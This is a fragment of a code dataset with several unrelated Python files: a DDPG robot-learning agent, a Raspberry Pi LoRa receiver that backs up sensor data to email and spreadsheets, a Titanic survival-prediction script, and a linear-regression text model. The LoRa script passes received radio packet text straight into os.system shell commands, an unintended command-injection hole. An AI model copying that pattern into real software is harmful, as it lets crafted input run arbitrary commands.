self.critic_network.parameters(), lr=self.args.lr_critic)\n # use merged normalizer for all envs\n self.o_norm = normalizer(\n size=env_params['obs_to_normalize'], default_clip_range=self.args.clip_range, args=args)\n self.g_norm = normalizer(\n size=env_params['goal'], default_clip_range=self.args.clip_range, args=args)\n # create replay buffer\n if not self.args.eval and self.buffers is None:\n self.buffers = dict()\n for env_name in self.args.train_names:\n self.buffers[env_name] = replay_buffer(self.env_params['max_timesteps'], self.env_params['obs'], self.env_params['goal'],\n self.env_params['action'], self.args.buffer_size, env_name=env_name,\n sample_func=self.sample_func)\n self.device = torch.device(\"cuda\" if not self.args.no_cuda else \"cpu\")\n # if use gpu\n if self.args.eval:\n if not self.args.no_cuda:\n self.actor_network.cuda()\n self.actor_network.eval()\n else:\n if not self.args.no_cuda:\n self.actor_network.cuda()\n self.critic_network.cuda()\n self.actor_target_network.cuda()\n self.critic_target_network.cuda()\n self.actor_network.eval()\n self.actor_target_network.eval()\n self.critic_network.eval()\n self.critic_target_network.eval()\n\n def learn(self, log_callback=None):\n \"\"\"\n train the network\n\n \"\"\"\n # start to collect samples\n assert self.args.num_rollouts % self.args.num_parallel_envs == 0\n if self.resume_training:\n self.total_steps = self.ckpt_dict['total_steps']\n start_cycle = self.ckpt_dict['current_cycle'] + 1\n else:\n self.total_steps = 0\n start_cycle = 0\n for cycle in range(start_cycle, self.args.n_cycles):\n self.current_cycle = cycle\n cycle_start = time.time()\n logged_dict = dict()\n sampling_start = time.time()\n # collect data ==================================================================\n train_env_reward, train_env_sr, train_env_distance = [], [], []\n # print('\\n### Start collecting samples ###\\n')\n mb_obs, mb_ag, mb_g, mb_actions, total_success_rate_per_env, total_reward_per_env, total_distance_per_env, _ = collect_experiences(self.train_envs, self.args.num_rollouts,\n self.env_params[\n 'max_timesteps'], self.actor_network,\n self.o_norm, self.g_norm, self.env_params,\n video_count=0, cuda=not self.args.no_cuda,\n action_proc_func=self._select_actions,\n vec_env_names=self.train_vec_env_names, point_cloud=self.args.point_cloud)\n # store the episodes\n assert self.args.num_rollouts == len(self.train_vec_env_names)\n assert mb_obs.shape[0] == self.args.num_rollouts\n for i, env_name in enumerate(self.train_vec_env_names):\n self.buffers[env_name].store_episode(\n [mb_obs[i, :, :], mb_ag[i, :, :], mb_g[i, :, :], mb_actions[i, :, :]])\n # update normalizer\n self._update_normalizer([mb_obs, mb_ag, mb_g, mb_actions])\n # print to console =================================================\n print('== [EXP{:04d}:C{:03d}] success %: {:.3f}, reward: {:.2f}, dist: {:.3f}, env time: {:.2f} s across {} episodes'.format(self.args.expID, cycle,\n total_success_rate_per_env['average'], total_reward_per_env['average'], total_distance_per_env['average'], time.time() - sampling_start, mb_actions.shape[0]))\n # accumulate metrics\n train_env_reward.append(total_reward_per_env['average'])\n train_env_distance.append(total_distance_per_env['average'])\n train_env_sr.append(total_success_rate_per_env['average'])\n self.total_steps += self.args.num_rollouts * \\\n self.env_params['max_timesteps']\n logged_dict['avg_train_reward_train'] = np.mean(train_env_reward)\n logged_dict['avg_train_dist_train'] = np.mean(train_env_distance)\n logged_dict['avg_train_sr_train'] = np.mean(train_env_sr)\n logged_dict['total_env_steps'] = self.total_steps\n # start training ==================================================================\n training_start = time.time()\n update_infos = []\n num_multi_batch = self.args.n_batches // len(self.args.train_names)\n for b in range(num_multi_batch): # each iter trains all envs once\n # train the network\n update_info = self._update_network()\n update_infos.append(update_info)\n # average and log training metrics\n logged_dict.update(get_avg_values_across_batches(update_infos))\n # update targets\n self._soft_update_target_network(\n self.actor_target_network, self.actor_network)\n self._soft_update_target_network(\n self.critic_target_network, self.critic_network)\n logged_dict['fps'] = self.args.num_rollouts * \\\n self.env_params['max_timesteps'] // (time.time() - cycle_start)\n print('{:03d}:{} -- actor/l: {:.3f}, critic/l: {:.3f}, steps: {:.3e}, Cycle FPS: {}, train time: {:.2f} s -----\\n'.format(self.args.expID,\n cycle, logged_dict['actor_loss'], logged_dict['critic_loss'], self.total_steps, logged_dict['fps'], time.time() - training_start))\n # start to do the evaluation\n if self.args.eval_freq > 0 and (cycle % self.args.eval_freq == 0 or cycle == 0 or cycle == self.args.n_cycles - 1):\n logged_dict = self._eval_network(logged_dict)\n if log_callback is not None:\n log_callback(logged_dict)\n\n def _select_actions(self, pi):\n \"\"\"this function will choose action for the agent and do the exploration\"\"\"\n action = pi.cpu().numpy().squeeze()\n # add the gaussian\n action += self.args.noise_eps * \\\n self.env_params['action_max'] * np.random.randn(*action.shape)\n action = np.clip(\n action, -self.env_params['action_max'], self.env_params['action_max'])\n # random actions...\n random_actions = np.random.uniform(low=-self.env_params['action_max'], high=self.env_params['action_max'],\n size=self.env_params['action'])\n # choose if use the random actions\n action += np.random.binomial(1, self.args.random_eps,\n 1)[0] * (random_actions - action)\n return action\n\n def _update_normalizer(self, episode_batch):\n \"\"\"update the normalizer\"\"\"\n mb_obs, mb_ag, mb_g, mb_actions = episode_batch\n mb_ag_next = mb_ag[:, 1:, :]\n # get the number of normalization transitions\n num_transitions = mb_actions.shape[1]\n # create the new buffer to store them\n buffer_temp = {'obs': mb_obs,\n 'ag': mb_ag,\n 'g': mb_g,\n 'actions': mb_actions,\n 'ag_next': mb_ag_next,\n }\n transitions = self.sample_func(buffer_temp, num_transitions)\n # pre process the obs and g\n transitions['obs'], transitions['g'] = preproc_og(\n transitions['obs'], transitions['g'], clip_obs=self.args.clip_obs)\n # update\n self.o_norm.update(transitions['obs'])\n self.g_norm.update(transitions['g'])\n # recompute the stats\n self.o_norm.recompute_stats()\n self.g_norm.recompute_stats()\n\n def _soft_update_target_network(self, target, source):\n \"\"\"update targets\"\"\"\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(\n (1 - self.args.polyak) * param.data + self.args.polyak * target_param.data)\n\n def _get_train_data(self, env_name):\n # sample the episodes\n transitions = self.buffers[env_name].sample(self.args.batch_size)\n # pre-process the observation and goal\n o, o_next, g = transitions['obs'], transitions['obs_next'], transitions['g']\n transitions['obs'], transitions['g'] = preproc_og(\n o, g, clip_obs=self.args.clip_obs)\n transitions['obs_next'], transitions['g_next'] = preproc_og(\n o_next, g, clip_obs=self.args.clip_obs)\n # start to do the update\n obs_norm = self.o_norm.normalize(transitions['obs'])\n g_norm = self.g_norm.normalize(transitions['g'])\n inputs_norm = np.concatenate([obs_norm, g_norm], axis=-1)\n obs_next_norm = self.o_norm.normalize(transitions['obs_next'])\n g_next_norm = self.g_norm.normalize(transitions['g_next'])\n inputs_next_norm = np.concatenate(\n [obs_next_norm, g_next_norm], axis=-1)\n # transfer them into the tensor\n inputs_norm_tensor = torch.tensor(\n inputs_norm, dtype=torch.float32, device=self.device)\n inputs_next_norm_tensor = torch.tensor(\n inputs_next_norm, dtype=torch.float32, device=self.device)\n actions_tensor = torch.tensor(\n transitions['actions'], dtype=torch.float32, device=self.device)\n r_tensor = torch.tensor(\n transitions['r'], dtype=torch.float32, device=self.device)\n return inputs_norm_tensor, inputs_next_norm_tensor, actions_tensor, r_tensor\n\n # update the network\n def _update_network(self):\n # set models to train mode\n self.actor_network.train()\n self.actor_target_network.train()\n self.critic_network.train()\n self.critic_target_network.train()\n # train each object\n critic_losses, actor_losses = [], []\n self.actor_optim.zero_grad()\n self.critic_optim.zero_grad()\n for i, env_name in enumerate(self.args.train_names):\n inputs_norm_tensor, inputs_next_norm_tensor, actions_tensor, r_tensor = self._get_train_data(\n env_name)\n # calculate the target Q value function\n with torch.no_grad():\n # concatenate the stuffs\n actions_next = self.actor_target_network(\n inputs_next_norm_tensor)\n q_next_value = self.critic_target_network(\n inputs_next_norm_tensor, actions_next)\n q_next_value = q_next_value.detach()\n target_q_value = r_tensor + self.args.gamma * q_next_value\n target_q_value = target_q_value.detach()\n # clip the q value\n clip_return = 1 / (1 - self.args.gamma)\n target_q_value = torch.clamp(target_q_value, -clip_return, 0)\n # the q loss\n real_q_value = self.critic_network(\n inputs_norm_tensor, actions_tensor)\n critic_loss = (target_q_value - real_q_value).pow(2).mean()\n critic_losses.append(critic_loss)\n # the actor loss\n actions_real = self.actor_network(inputs_norm_tensor)\n actor_loss = - \\\n self.critic_network(inputs_norm_tensor, actions_real).mean()\n action_l2_norm = (\n actions_real / self.env_params['action_max']).pow(2).mean()\n actor_loss += self.args.action_l2 * action_l2_norm\n actor_losses.append(actor_loss)\n actor_loss = sum(actor_losses)\n critic_loss = sum(critic_losses)\n self.actor_optim.zero_grad()\n actor_loss.backward()\n self.actor_optim.step()\n # update the critic_network\n self.critic_optim.zero_grad()\n critic_loss.backward()\n self.critic_optim.step()\n\n # set models to eval mode\n self.actor_network.eval()\n self.actor_target_network.eval()\n self.critic_network.eval()\n self.critic_target_network.eval()\n\n update_info = dict(actor_loss=actor_loss, critic_loss=critic_loss)\n return update_info\n\n def _save_ckpt(self, exp_path):\n # save general checkpoint for training resume\n general_checkpoint = dict(actor_network=self.actor_network,\n actor_target_network=self.actor_target_network,\n critic_network=self.critic_network,\n critic_target_network=self.critic_target_network,\n actor_optim=self.actor_optim,\n critic_optim=self.critic_optim,\n o_norm=self.o_norm,\n g_norm=self.g_norm,\n current_cycle=self.current_cycle,\n total_steps=self.total_steps,\n args=self.args)\n if not self.args.no_save_buffer:\n general_checkpoint['buffers'] = self.buffers\n general_save_path = os.path.join(\n exp_path, '{}_general_{:04d}.tar'.format(self.agent_type, self.args.expID))\n torch.save(general_checkpoint, general_save_path)\n print('** general checkpoint saved to {}'.format(general_save_path))\n\n eval_checkpoint = dict(actor_network=self.actor_network,\n o_norm=self.o_norm,\n g_norm=self.g_norm)\n eval_save_path = os.path.join(exp_path, '{}_eval_{:04d}_J{}.tar'.format(\n self.agent_type, self.args.expID, self.current_cycle))\n torch.save(eval_checkpoint, eval_save_path)\n print('** eval checkpoint saved to {}'.format(eval_save_path))\n\n def _load_pointnet(self):\n pointnet_load_path = './dex_logs/pointnet/pointnet_{:04d}'.format(\n self.args.pointnet_load_path)\n fname = 'feat_model.pth'\n pretrain_weights = torch.load(os.path.join(pointnet_load_path, fname))\n for nn_name in ['actor_network', 'critic_network', 'actor_target_network', 'critic_target_network']:\n nn = getattr(self, nn_name)\n nn.features_net.pointnet.load_state_dict(pretrain_weights)\n if not self.args.finetune_pointnet:\n for name, p in nn.features_net.pointnet.named_parameters():\n p.requires_grad = False\n print('*** successfully loaded pointnet feature model ***')\n","repo_name":"huangwl18/geometry-dex","sub_path":"rl_modules/ddpg_agent.py","file_name":"ddpg_agent.py","file_ext":"py","file_size_in_byte":19162,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"6"} +{"seq_id":"42992991012","text":"###Author: Jennifer Brana\n###Last modification: 4/25/2023\n\n\n# Import Python System Libraries\nimport time\n# Import Blinka Libraries\nimport busio\nfrom digitalio import DigitalInOut, Direction, Pull\nimport board\n# Import the SSD1306 module.\nimport adafruit_ssd1306\n# Import RFM9x\nimport adafruit_rfm9x\n\nimport time\nimport busio\nimport digitalio\nimport board\nimport time\nimport os\nimport sys\nimport checksum\n\nsys.path.insert(0,'/home/bagel1/TeamLiftCSWaterProject/CloudUpload')\nfrom datetime import datetime\nfrom datapusher import sendFile,getSpreadsheetAck\nfrom emailsender import sendEmail,getEmailAck\nfrom sendUnacked import sendUnackedUpload\n\n# Delay between sending radio data, in minutes\nSENSOR_SEND_DELAY = 1\n\n# Create the I2C interface.\ni2c = busio.I2C(board.SCL, board.SDA)\n\n# Create library object using our Bus I2C port\n#bme280 = adafruit_bme280.Adafruit_BME280_I2C(i2c)\n\n##Define buttons for testing\n# Button A\nbtnA = DigitalInOut(board.D5)\nbtnA.direction = Direction.INPUT\nbtnA.pull = Pull.UP\n\n# Button B\nbtnB = DigitalInOut(board.D6)\nbtnB.direction = Direction.INPUT\nbtnB.pull = Pull.UP\n\n# Button C\nbtnC = DigitalInOut(board.D12)\nbtnC.direction = Direction.INPUT\nbtnC.pull = Pull.UP\n\n\n# 128x32 OLED Display\nreset_pin = DigitalInOut(board.D4)\ndisplay = adafruit_ssd1306.SSD1306_I2C(128, 32, i2c, reset=reset_pin)\n# Clear the display.\ndisplay.fill(0)\ndisplay.show()\nwidth = display.width\nheight = display.height\n\n#define radio frequency\nRADIO_FREQ_MHZ = 915.0\n\n# Configure LoRa Radio\nCS = DigitalInOut(board.CE1)\nRESET = DigitalInOut(board.D25)\nspi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)\nrfm9x = adafruit_rfm9x.RFM9x(spi, CS, RESET, RADIO_FREQ_MHZ)\n\n#set transmit power to max\nrfm9x.tx_power = 23\n\nprev_packet = None\n\n# Define the onboard LED\nLED = digitalio.DigitalInOut(board.D13)\nLED.direction = digitalio.Direction.OUTPUT\n\n# create empty packet for sensor data\npacket = bytearray(16)\n\n#start_time = time.monotonic()\n#elapsed_time = time.monotonic() - start_time\n\n\n \n\ntime_string = str(datetime.now().strftime(\"%m-%d-%Y-%H-%M-%S\")) + \".txt\"\n#startTime interval is the start of the timer's timeWindow\nstartIntervalTime = time.perf_counter()\n#the time window between successive uploads to the spreadsheets and email cloud\nfileBackupFrequency = 30\nstartTimeSend = time.perf_counter()\n#the time window between sending the adjustment time to the Field RTC\ntimeSendFrequency = 10\nwhile True:\n endIntervalTime = time.perf_counter()\n endTimeSend = time.perf_counter()\n \n adjustTime = datetime.now().strftime(\"%m-%d-%Y-%H-%M-%S\")\n rfm9x.send(bytearray(adjustTime,'UTF-8'))\n #the if statement over a timer delay, after a certain amount of time has passed, to upload to cloud\n if((endIntervalTime- startIntervalTime) > fileBackupFrequency):\n \n\n time_string = str(datetime.now().strftime(\"%m-%d-%Y-%H-%M-%S\")) + \".txt\"\n base_filepath = \"../CloudUpload/\"+time_string\n \n #copies aggregate data textfile to timestamped texfile \n os.system(\"cp ../CloudUpload/agg_data.txt \" + base_filepath);\n os.system(\"echo -n '' > ../CloudUpload/agg_data.txt\")\n \n #the following code sends the data to the cloud via an email, and by sending it to the spreadsheet\n #the boolean value for whether the upload was acknowledged, is retreived \n isEmailAcked = False\n isSpreadsheetAcked = False\n try:\n \n sendEmail(base_filepath)\n time.sleep(2)\n isEmailAcked = getEmailAck(base_filepath)\n except BaseException as k:\n print(k)\n \n try:\n sendFile(base_filepath)\n isSpreadsheetAcked = getSpreadsheetAck(base_filepath)\n except BaseException as k:\n print(k);\n \n #this if conditions, test different scenarios \n #first scenario: if file was acknowledged for spreadhseets and email, move file to CompleteAcked folder\n #second scenario: if file was acknowledged for spreadhseets and not for email, move file to SpreadsheetAcked folder\n #third scenario: if file was acknowledged for email and not for spreadsheets, move file to EmailAcked folder\n #fourth scenario: if file was not acknowledged either spreadhseets nor for email, move file to Unacked folder\n \n if(isEmailAcked and isSpreadsheetAcked):\n os.system(\"mv \"+ base_filepath + \" ../CloudUpload/CompleteAcked/\" )\n \n elif((not isEmailAcked) and isSpreadsheetAcked):\n os.system(\"mv \"+ base_filepath + \" ../CloudUpload/SpreadsheetAcked/\" )\n elif(isEmailAcked and (not isSpreadsheetAcked)):\n os.system(\"mv \"+ base_filepath + \" ../CloudUpload/EmailAcked/\" )\n \n elif((not isEmailAcked) and (not isSpreadsheetAcked)):\n os.system(\"mv \"+ base_filepath + \" ../CloudUpload/Unacked/\" )\n \n startIntervalTime = endIntervalTime\n try:\n sendUnackedUpload()\n except BaseException as k:\n print(k)\n \n \n \n \n \n packet = None\n # draw a box to clear the image\n display.fill(0)\n display.text('RasPi LoRa', 35, 0, 1)\n\n # check for packet rx\n packet = rfm9x.receive()\n if packet is None:\n display.show()\n display.text('- Waiting for PKT -', 15, 20, 1)\n else:\n # Display the packet text and rssi\n display.fill(0)\n prev_packet = packet\n display.text('RX: ', 0, 0, 1)\n display.show()\n time.sleep(1)\n\n #create ack packet to send ack back to the sender\n #pkt_id = prev_packet[-1] #get the packet id, this is the last byte of the byte array\n #ack_msg = bytearray(7) #create byte array of all zeros\n #send_back = ack_msg + pkt_id #append the packet id of the previous packet to this one\n send_back = checksum.checksum(prev_packet) #compute a checksum of the packet received and send it back.\n\n #send ack back to the sender\n if send_back is not None:\n display.fill(0)\n rfm9x.send(bytearray(str(send_back),'UTF-8'))#actual sending of data\n display.text('send ack', 15, 20, 1)\n\n display.show()\n time.sleep(1)\n\n\n \n try: \n agg_data_row = str(prev_packet,'utf-8')\n print(\"aggregate data row = \" , agg_data_row)\n os.system(\"echo \" + \"'\" + agg_data_row + \"'\" + \" >> \" + \"../CloudUpload/agg_data.txt\")\n #timestamp = int.from_bytes(packet_text.split(b' ')[1], 'big')\n #agg_data_row = data_values + \",\" + str(timestamp)\n \n except BaseException as k:\n print(k)\n\n\n #test buttons sending\n #if not btnA.value:\n # Send Button A\n #display.fill(0)\n #button_a_data = bytes(\"Button A!\\r\\n\",\"utf-8\")\n #rfm9x.send(button_a_data)\n #display.text('Sent Button A!', 25, 15, 1)\n #elif not btnB.value:\n # Send Button B\n #display.fill(0)\n #button_b_data = bytes(\"Button B!\\r\\n\",\"utf-8\")\n #rfm9x.send(button_b_data)\n #display.text('Sent Button B!', 25, 15, 1)\n #elif not btnC.value:\n # Send Button C\n #display.fill(0)\n #button_c_data = bytes(\"Button C!\\r\\n\",\"utf-8\")\n #rfm9x.send(button_c_data)\n #display.text('Sent Button C!', 25, 15, 1)\n\n\n display.show()\n time.sleep(0.1)\n","repo_name":"mcenek/TeamLiftCSWaterProject","sub_path":"lora/loraReceiver.py","file_name":"loraReceiver.py","file_ext":"py","file_size_in_byte":7445,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"37296797763","text":"\n# coding: utf-8\n\n#

Titanic

\n#RMS Titanic was a British passenger liner that sank in the North Atlantic Ocean in the early hours of 15 April 1912, after colliding with an iceberg during its maiden voyage from Southampton to New York City. There were an estimated 2,224 passengers and crew aboard, and more than 1,500 died, making it one of the deadliest commercial peacetime maritime disasters in modern history. RMS Titanic was the largest ship afloat at the time it entered service and was the second of three Olympic-class ocean liners operated by the White Star Line. It was built by the Harland and Wolff shipyard in Belfast. ~Wikipedia\n#The iceberg unraveled the ship's hull at a length of 90 meters - the length of the hull plating was 90 m, but on the basis of the examination of the size of damage it was clearly stated that it was a series of cracks, the total area of which was just over 1 square meter (1.18), that is, it was equal to the body surface of an adult human.\n# This is my first more extensive program. Writing it, I start my adventure with \"more serious programming\". This is a secound aproach, this time with OOP.\n\n#

Chapters:

\n#\n#1. Library and data import\n#2. Analysis, data cleaning and visualization\n#3. Preparation of data for the model\n#4. Creating a model\n#5. Analysis of correctness of the solution and visualization\n#6. Method analysis\n#7. Reporting the solution on kaggle\n#\n\n#1. Library and data import\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt #Plotting library\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ntry:\n train = pd.DataFrame(pd.read_csv('data/train.csv'))\n test = pd.DataFrame(pd.read_csv('data/test.csv'))\n test_w = pd.DataFrame(pd.read_csv('data/test.csv'))\nexcept FileNotFoundError:\n print(\"Błędna ścieżka\")\n\ntest.set_index('PassengerId', inplace=True)\ntrain.set_index('PassengerId', inplace=True)\n\n#2. Analysis, data cleaning and visualization\n\n#\n#2.1. Sex
\n#2.2. Class
\n#2.3. Embarkment
\n#2.4. Family size
\n#2.5. Fare
\n#
\n\ndef info_null(column):\n return column.isnull().sum()\n\ndef filling_NaN(column):\n null_n = info_null(column)\n \n if null_n > 0 and (null_n <= 50):\n message = 'There are %d fields missing, they are filled with most common value: \"%s\"' % (null_n, column.mode()[0])\n column.fillna(column.mode()[0], inplace = True)\n if null_n > 50:\n message = 'There is over 50 empty fields. A more accurate approximation is recommended.' \n else:\n message = 'There are no empty fields.'\n \n return message\n\ndef family_merge(dataset):\n if 'FamilySize' not in dataset.columns:\n dataset['FamilySize'] = dataset['Parch'] + dataset['SibSp']\n\ndef info_discrete(column):\n print(filling_NaN(column))\n \n categories = column.unique()\n survived_perc = list()\n labels = list()\n for label in categories:\n labels.append(label)\n survived_perc.append([label, train.Survived[column == label].value_counts(normalize=True).sort_index()][1][1])\n\n plot1 = plt.plot(labels, survived_perc, 'bo')\n plt.title('Survival rate('+column.name+')')\n return plot1\n\ndef info_continous(column, step):\n print(filling_NaN(column))\n \n scope = column.max() - column.min() - step\n survived_perc = list()\n labels = list()\n for i in range(0, int(scope), step):\n survived_perc.append(train.Survived[column.between(i, i+5)].mean())\n labels.append(i)\n \n plot2 = plt.plot(labels, survived_perc, 'bo', ls = '-')\n plt.title('Survival rate('+column.name+')')\n return plot2\n\ndef number_cases(column, step):\n scope = column.max() - column.min() - step\n survived_num = list()\n labels = list()\n for i in range(0, int(scope), step):\n survived_num.append(train.Survived[column.between(i, i+5)].count())\n labels.append(i)\n \n plot3 = plt.bar(labels, survived_num, align = 'center')\n plt.title('Number of cases('+column.name+')')\n return plot3\n\ninfo_discrete(train['Sex'])\n\ninfo_discrete(train['Pclass'])\n\ninfo_discrete(train['Embarked'])\n\ninfo_continous(train['Age'],3)\n\nnumber_cases(train['Age'],1)\n\ninfo_continous(train['Fare'],8)\n\nnumber_cases(train['Fare'],8)\n\n#Due to the small amount of cases and shape of the previous graph showing the percentage of survivors, values above 50 inclusive will be marked as 50.\n\nfamily_merge(train)\nfamily_merge(test)\n\ninfo_continous(train['FamilySize'],1)\n\nnumber_cases(train['FamilySize'],1)\n\n#

3. Data preparation

\n\ntest['Fare'].fillna(int(test['Fare'].median()), inplace = True)\n\n\ntrain.drop(['Ticket', 'Cabin', 'Name'], axis = 1,inplace = True)\ntest.drop(['Ticket', 'Cabin', 'Name'], axis = 1, inplace = True)\n\ntest['Sex'] = test['Sex'].map({'female': 0, 'male': 1}).astype(int)\ntrain['Sex'] = train['Sex'].map({'female': 0, 'male': 1}).astype(int)\n\ndata = train.append(test, sort = True)\n\nfor i in range(1,1310):\n if data.loc[i, 'Sex'] == 1 and (data.loc[i, 'Pclass'] == 1):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 41\n if data.loc[i, 'Sex'] == 0 and (data.loc[i, 'Pclass'] == 1):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 37\n if data.loc[i, 'Sex'] == 1 and (data.loc[i, 'Pclass'] == 2):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 31\n if data.loc[i, 'Sex'] == 0 and (data.loc[i, 'Pclass'] == 2):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 27\n if data.loc[i, 'Sex'] == 1 and (data.loc[i, 'Pclass'] == 3):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 26\n if data.loc[i, 'Sex'] == 0 and (data.loc[i, 'Pclass'] == 3):\n if np.isnan(data.loc[i, 'Age']):\n data.loc[i, 'Age'] = 22\n\ndata.drop(['SibSp', 'Parch'],axis=1,inplace=True)\n\ndata['Embarked'] = data['Embarked'].map({'S':1, 'C':2, 'Q':3}).astype(int)\n\ndata.loc[ data['Fare'] > 50, 'Fare'] = 50\ndata['Fare'] = data['Fare'].astype(int)\n\ntraining = data.iloc[:891,:]\ntesting = data.iloc[891:,:]\ntrainY = training['Survived']\ntrainX = training.drop(['Survived'], axis = 1)\ntestX = testing.drop(['Survived'], axis = 1)\n\n#

4. Model

\n\n\n# machine learning\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\n\n# creating odd list of K for KNN\nmyList = list(range(1,50))\n\n# subsetting just the odd ones\nneighbors = list(range(1,50))\n\n# empty list that will hold cv scores\ncv_scores = []\n\n# perform 10-fold cross validation\nfor k in neighbors:\n knn = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(knn, trainX, trainY, cv=10, scoring='f1')\n cv_scores.append(scores.mean())\n \nfrom sklearn.metrics import accuracy_score\n# changing to misclassification error\nMSE = [1 - x for x in cv_scores]\n\n# determining best k\noptimal_k = neighbors[MSE.index(min(MSE))]\nprint(\"The optimal number of neighbors is %d\" % optimal_k)\n\n# plot misclassification error vs k\nplt.plot(neighbors, MSE)\nplt.xlabel('Number of Neighbors K')\nplt.ylabel('Misclassification Error')\nplt.show()\n\ndef model_choice(trainX, trainY, testX):\n from sklearn.linear_model import LogisticRegression\n from sklearn.svm import SVC, LinearSVC\n from sklearn.ensemble import RandomForestClassifier\n from sklearn.neighbors import KNeighborsClassifier\n from sklearn.naive_bayes import GaussianNB\n from sklearn.linear_model import Perceptron\n from sklearn.linear_model import SGDClassifier\n from sklearn.tree import DecisionTreeClassifier\n \n reglog = LogisticRegression()\n reglog.fit(trainX, trainY)\n Y_predLR = reglog.predict(testX)\n acc_log = round(reglog.score(trainX, trainY) * 100, 2)\n \n knn = KNeighborsClassifier(n_neighbors = 5)\n knn.fit(trainX, trainY)\n Y_predKNN = knn.predict(testX)\n acc_knn = round(knn.score(trainX, trainY) * 100, 2)\n\n gaussian = GaussianNB()\n gaussian.fit(trainX, trainY)\n Y_predG = gaussian.predict(testX)\n acc_gaussian = round(gaussian.score(trainX, trainY) * 100, 2)\n\n perceptron = Perceptron()\n perceptron.fit(trainX, trainY)\n Y_predP = perceptron.predict(testX)\n acc_perceptron = round(perceptron.score(trainX, trainY) * 100, 2)\n\n svc = SVC()\n svc.fit(trainX, trainY)\n Y_pred = svc.predict(testX)\n acc_svc = round(svc.score(trainX, trainY) * 100, 2)\n\n linear_svc = LinearSVC()\n linear_svc.fit(trainX, trainY)\n Y_predLSVC = linear_svc.predict(testX)\n acc_linear_svc = round(linear_svc.score(trainX, trainY) * 100, 2)\n\n sgd = SGDClassifier()\n sgd.fit(trainX, trainY)\n Y_predSGD = sgd.predict(testX)\n acc_sgd = round(sgd.score(trainX, trainY) * 100, 2)\n\n decision_tree = DecisionTreeClassifier()\n decision_tree.fit(trainX, trainY)\n Y_predD = decision_tree.predict(testX)\n acc_decision_tree = round(decision_tree.score(trainX, trainY) * 100, 2)\n\n random_forest = RandomForestClassifier(n_estimators=400, max_features = 'sqrt', oob_score = True, n_jobs = -1)\n random_forest.fit(trainX, trainY)\n Y_predRF = random_forest.predict(testX)\n random_forest.score(trainX, trainY)\n acc_random_forest = round(random_forest.score(trainX, trainY) * 100, 2)\n\n print('LogisticRegression =', acc_log)\n print('KNeighborsClassifier =', acc_knn)\n print('GaussianNB =', acc_gaussian)\n print('Perceptron =', acc_perceptron)\n print('LinearSVC =', acc_linear_svc)\n print('SVC =', acc_svc)\n print('SGDClassifier =', acc_sgd)\n print('DecisionTreeClassifier =', acc_decision_tree)\n print('RandomForestClassifier =', acc_random_forest)\n\nmodel_choice(trainX, trainY, testX)\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nrandom_forest = RandomForestClassifier(n_estimators=400, max_features = 'sqrt', oob_score = True, n_jobs = -1)\nrandom_forest.fit(trainX, trainY)\nY_predRF = random_forest.predict(testX).astype('int64', copy = False)\nrandom_forest.score(trainX, trainY)\nacc_random_forest = round(random_forest.score(trainX, trainY) * 100, 2)\n\nsubmission = pd.DataFrame({\n \"PassengerId\": test_w[\"PassengerId\"],\n \"Survived\": Y_predRF\n })\n\nsubmission.to_csv('/home/jan/Dokumenty/MINT/Kaggle/Tytanic/submission.csv', index=False)\n","repo_name":"jantar44/titanic","sub_path":"Tytanic.py","file_name":"Tytanic.py","file_ext":"py","file_size_in_byte":10659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14260173029","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.feature_extraction.text import TfidfVectorizer, TfidfTransformer\nfrom scipy.sparse import hstack\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport pickle\nimport argparse\n\nclass LinReg():\n \"\"\"Train, Test and Visualise a Linear Reg Model\"\"\"\n\n def __init__(self, data_loc):\n self.data_loc = data_loc\n\n def train_data(self, loc = None ,split = 0.1) :\n data = pd.read_csv(self.data_loc)\n data[\"original\"].str.lower()\n data[\"edit\"].str.lower()\n\n feature_cols = [\"original\", \"edit\"]\n X = data[feature_cols]\n y = data[[\"meanGrade\"]]\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=split)\n vectorizer = TfidfVectorizer(sublinear_tf=True, min_df=2, norm='l2',\n ngram_range=(1, 2), stop_words='english')\n X_train_o = vectorizer.fit_transform(X_train[\"original\"], X_train[\"edit\"])\n X_test_o = vectorizer.transform(X_test[\"original\"], X_test[\"edit\"])\n\n linreg = LinearRegression()\n linreg.fit(X_train_o, y_train)\n pred = linreg.predict(X_test_o)\n\n lis1 = y_test[\"meanGrade\"].values.tolist()\n print_data = X_test\n print_data[\"meanGrade\"] = lis1\n print_data[\"PredGrade\"] = pred\n lis2 = print_data.values.tolist()\n\n for i in lis2:\n print(\"original:\",i[0], \"Edited Word:\", i[1], \"Mean Grade:\",i[2], \"Prediction:\",i[3])\n print('Mean squared error: %.2f'\n % sqrt(mean_squared_error(y_test, pred)))\n\n filename1 = loc + 'finalized_model.sav'\n fileneame2 = loc + \"feature.pkl\"\n pickle.dump(linreg, open(filename1, 'wb'))\n pickle.dump(vectorizer.vocabulary_,open(fileneame2,\"wb\"))\n\n def test_data(self, loc):\n filename1 = loc + 'finalized_model.sav'\n fileneame2 = loc + 